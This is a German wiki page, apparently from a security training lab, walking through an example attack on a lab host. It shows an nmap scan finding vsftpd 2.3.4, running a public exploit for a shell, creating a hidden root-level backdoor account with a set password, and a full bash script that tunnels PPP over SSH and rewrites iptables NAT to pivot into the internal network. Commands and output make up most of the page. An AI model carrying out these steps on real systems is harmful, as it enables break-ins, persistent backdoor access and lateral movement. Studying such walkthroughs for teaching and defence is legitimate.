Exemplarischer Angriff: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
| − | = | + | =Angreifer= |
| + | ==Scan== | ||
*nmap -sV 10.80.100.105 -p 21 | *nmap -sV 10.80.100.105 -p 21 | ||
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST | Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST | ||
| Zeile 8: | Zeile 9: | ||
21/tcp open ftp vsftpd 2.3.4 | 21/tcp open ftp vsftpd 2.3.4 | ||
Service Info: OS: Unix | Service Info: OS: Unix | ||
| − | =Nach Exploit googlen= | + | ==Nach Exploit googlen== |
;vsftpd 2.3 4 exploit-db | ;vsftpd 2.3 4 exploit-db | ||
| − | =Exploit finden= | + | ==Exploit finden== |
*https://www.exploit-db.com/exploits/49757 | *https://www.exploit-db.com/exploits/49757 | ||
| − | =Exploit ausführen= | + | ==Exploit ausführen== |
*python vsftp.py 10.80.100.105 | *python vsftp.py 10.80.100.105 | ||
Success, shell opened | Success, shell opened | ||
Send `exit` to quit shell | Send `exit` to quit shell | ||
| − | =Läuft ssh?= | + | =Opfer= |
| + | ==Läuft ssh?== | ||
*netstat -lntp | grep 22 | *netstat -lntp | grep 22 | ||
tcp6 0 0 :::22 :::* LISTEN 4360/sshd | tcp6 0 0 :::22 :::* LISTEN 4360/sshd | ||
| − | =User anlegen= | + | ==User anlegen== |
*useradd -m -o -u 0 -s /bin/bash -d /var/www www | *useradd -m -o -u 0 -s /bin/bash -d /var/www www | ||
*passwd www | *passwd www | ||
| Zeile 25: | Zeile 27: | ||
Retype new UNIX password: www2www | Retype new UNIX password: www2www | ||
passwd: password updated successfully | passwd: password updated successfully | ||
| − | |||
| − | |||
| − | |||
=VPN einrichten um Zugriff zum Netz zu erlangen= | =VPN einrichten um Zugriff zum Netz zu erlangen= | ||
*apt-get install ppp | *apt-get install ppp | ||
| − | =vpn-gateway= | + | =Angreifer= |
| + | ==vpn-gateway== | ||
*/usr/local/sbin/vpn-hack | */usr/local/sbin/vpn-hack | ||
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
Version vom 7. Oktober 2021, 15:14 Uhr
Angreifer
Scan
- nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST Nmap scan report for 10.80.100.105 Host is up (0.00056s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix
Nach Exploit googlen
- vsftpd 2.3 4 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened Send `exit` to quit shell
Opfer
Läuft ssh?
- netstat -lntp | grep 22
tcp6 0 0 :::22 :::* LISTEN 4360/sshd
User anlegen
- useradd -m -o -u 0 -s /bin/bash -d /var/www www
- passwd www
Enter new UNIX password: www2www Retype new UNIX password: www2www passwd: password updated successfully
VPN einrichten um Zugriff zum Netz zu erlangen
- apt-get install ppp
Angreifer
vpn-gateway
- /usr/local/sbin/vpn-hack
#!/bin/bash
LOG="/var/log/vpn-hack.log"
REMOTE_IP="/tmp/remote-ip"
vpn_hack () {
OKT=$(cat $REMOTE_IP | cut -f 1-3 -d .)
rm $REMOTE_IP
LOCAL_NET=10.86.0.0/16
REMOTE_NET=${OKT}.0/24
########
PATH=/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/bin/X11/:
ADD_SNAT="/sbin/iptables -t nat -A POSTROUTING -s $LOCAL_NET -j MASQUERADE -o eth0"
FLUSH_SNAT="/sbin/iptables -t nat -F"
date >> $LOG
echo $OKT >> $LOG
echo "Starting vpn to localhost -p 9922: " >> $LOG
pppd updetach noauth passive pty "ssh -P localhost -p 9922 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.3:172.29.29.1 >> $LOG
ssh -P localhost -p 9922 route add -net ${LOCAL_NET} gw 172.29.29.3 >> $LOG
route add -net ${REMOTE_NET} gw 172.29.29.1 >> $LOG
ssh -P localhost -p 9922 ${FLUSH_SNAT} >> $LOG
ssh -P localhost -p 9922 ${ADD_SNAT} >> $LOG
}
if test -f $REMOTE_IP
then
vpn_hack
fi